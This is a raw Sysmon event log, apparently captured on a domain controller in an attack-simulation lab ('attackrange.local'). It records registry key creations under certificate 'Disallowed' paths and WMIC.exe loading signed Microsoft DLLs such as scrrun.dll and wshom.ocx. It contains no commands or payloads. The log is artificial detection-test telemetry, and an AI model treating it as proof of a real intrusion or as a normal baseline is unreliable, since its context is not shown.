12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057348870Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057348869Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057348868Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348867Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348866Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348865Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057348864Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.889{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\sxs.dll10.0.14393.4169 (rs1_release.210107-1130)Fusion 2.5Microsoft® Windows® Operating SystemMicrosoft CorporationSXS.DLLMD5=54FB18CA661D074CBB60D5A58D40C8D3,SHA256=A2BD6160222A216F8A6830C1273662F8AE88F53D2CE6DA5893FF70D146A0A2B0trueMicrosoft WindowsValid 12241200x800000000000000057348863Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348862Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348861Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348860Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348859Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348858Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348857Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348856Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348855Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348854Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348853Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348852Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348851Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348850Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348849Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\Wbem\WMIC.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SyncRootManager 12241200x800000000000000057348848Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057348847Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057348846Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 734700x800000000000000057348845Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.889{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\scrrun.dll5.812.10240.16384Microsoft ® Script RuntimeMicrosoft ® Script RuntimeMicrosoft Corporationscrrun.dllMD5=054FEAD31C0C7971121014D429A5A7D0,SHA256=9CD76701ED1693C191C1617560BC8C5F676A03A420E0BD596FF5388CA1AF58B6trueMicrosoft WindowsValid 12241200x800000000000000057348844Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057348843Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057348842Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057348841Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348840Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348839Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348838Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348837Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348836Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348835Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348834Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.904{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348833Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348832Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348831Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348830Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348829Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348828Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348827Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348826Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348825Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348824Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348823Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\Wbem\WMIC.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFolders 12241200x800000000000000057348822Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\Wbem\WMIC.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace 734700x800000000000000057348821Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.889{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\actxprxy.dll10.0.14393.3808 (rs1_release.200707-2105)ActiveX Interface Marshaling LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationActXPrxy.dllMD5=087C47C19BBFCB9F4932C03C0189E86B,SHA256=9BEE35FBFA2E595372D82E8858BE46CE7717E0399996960398BC238F4D0E5207trueMicrosoft WindowsValid 12241200x800000000000000057348820Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057348819Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.889{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\propsys.dll7.0.14393.4169 (rs1_release.210107-1130)Microsoft Property SystemWindows® SearchMicrosoft Corporationpropsys.dllMD5=013D2BA96C261CDC62ECA7365E1C84D5,SHA256=26896478B6F1AF3756D5B1BB59BF2C6BE1C579B122CC882BAC35FEFB3EC3EE36trueMicrosoft WindowsValid 12241200x800000000000000057348818Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057348817Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.889{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValid 12241200x800000000000000057348816Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057348815Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057348814Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057348813Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057348812Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057348811Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057348810Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348809Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348808Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348807Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348806Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 734700x800000000000000057348805Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.873{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wshom.ocx5.812.10240.16384Windows Script Host Runtime LibraryMicrosoft ® Windows Script Host Runtime LibraryMicrosoft Corporationwshom.ocxMD5=2CCC0321D28C4EDC1C256972A34AEE59,SHA256=A6A527A6A7CE62ABDFD2348C26E9D5D87650D66BAC0AA998125335615DE220B3trueMicrosoft WindowsValid 12241200x800000000000000057348804Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348803Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348802Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348801Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348800Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348799Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348798Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348797Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348796Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348795Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348794Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348793Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348792Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348791Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057348790Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057348789Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.889{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057348788Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.873{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValid 734700x800000000000000057348787Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.873{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValid 734700x800000000000000057348786Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.873{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\mpr.dll10.0.14393.2879 (rs1_release_inmarket.190313-1855)Multiple Provider Router DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmpr.dllMD5=0E56DB60C434D51769F2DAC48B9AA686,SHA256=3F9AED98B1B7F6A59C219F622FD91C7FD20BFE280935F5334920A02ECCAE7ED6trueMicrosoft WindowsValid 734700x800000000000000057348785Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.873{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\windows.storage.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=1D7997E3AFC26B85024D33F835E18056,SHA256=B2376967E156D4971FB66059F6367030AF937943D2EBF80AF856E643B6E95BBFtrueMicrosoft WindowsValid 12241200x800000000000000057348784Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057348783Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057348782Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057348781Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057348780Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057348779Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 